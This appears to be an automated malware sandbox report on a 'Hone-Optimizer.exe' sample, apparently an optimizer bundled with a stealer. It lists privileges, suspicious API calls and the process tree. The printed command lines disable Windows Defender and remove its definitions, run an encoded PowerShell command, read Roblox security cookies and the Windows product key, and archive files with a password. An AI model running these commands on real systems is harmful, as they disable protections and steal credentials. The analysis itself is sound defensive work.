Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2292 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 2292 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe
PID 3632 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3088 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3088 wrote to memory of 5112 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2148 wrote to memory of 1772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1780 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1780 wrote to memory of 1212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3192 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3192 wrote to memory of 2008 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4572 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 4572 wrote to memory of 3276 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 3276 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 3276 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 1184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1872 wrote to memory of 1184 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1872 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 1744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3632 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4244 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4244 wrote to memory of 1508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1872 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 1872 wrote to memory of 2532 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Conhost.exe
PID 3632 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 1872 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1872 wrote to memory of 4820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1004 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1004 wrote to memory of 4248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3632 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4412 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4412 wrote to memory of 4476 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3632 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 4932 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 4932 wrote to memory of 4240 N/A C:\Windows\system32\cmd.exe C:\Program Files\Windows Defender\MpCmdRun.exe
PID 1236 wrote to memory of 4692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1236 wrote to memory of 4692 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3632 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 3776 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3632 wrote to memory of 4748 N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe C:\Windows\system32\cmd.exe
PID 3776 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3776 wrote to memory of 216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A
HTTP User-Agent header curl/8.7.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6E5A.tmp\6E5B.tmp\6E5C.bat C:\Users\Admin\AppData\Local\Temp\bound.exe"

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\reg.exe

reg add HKLM /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\CrashControl" /v "DisplayParameters" /t REG_DWORD /d "1" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\reg.exe

reg add HKCU\CONSOLE /v VirtualTerminalLevel /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "Disclaimer"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command elided]"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64 encoded command elided]

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rkt2fkxp\rkt2fkxp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C35.tmp" "c:\Users\Admin\AppData\Local\Temp\rkt2fkxp\CSCA56DE6D1AF5D49FCBCBCAC41BC1EE192.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\n8T1k.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Hone" /v "Disclaimer" /f

C:\Windows\system32\curl.exe

curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"

C:\Windows\system32\Dism.exe

dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart

C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe

C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe {3F511729-BF4E-4763-8326-9B58EB2EF9F5}

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:4

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c date /t

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y

C:\Windows\system32\reg.exe

reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\System32\choice.exe

C:\Windows\System32\choice.exe /c:1234567XD /n /m "  Select a corresponding number to the options above > "

C:\Windows\system32\mode.com

Mode 130,45

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_NetworkAdapter get PNPDeviceID

C:\Windows\system32\findstr.exe

findstr /L "VEN_"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value

C:\Windows\System32\Wbem\WMIC.exe

wmic os get TotalVisibleMemorySize /value

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Hone" /v "NVTTweaks"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"

C:\Windows\system32\findstr.exe

findstr "HKEY"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"

C:\Windows\system32\find.exe

find "0x1"

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"

C:\Windows\system32\find.exe

find "0x0"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass

C:\Windows\system32\find.exe

find "0x4"

C:\Windows\system32\reg.exe

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority

C:\Windows\system32\find.exe

find "0x3"

C:\Windows\system32\powercfg.exe

powercfg /GetActiveScheme

C:\Windows\system32\find.exe

find "Hone"

C:\Windows\system32\reg.exe

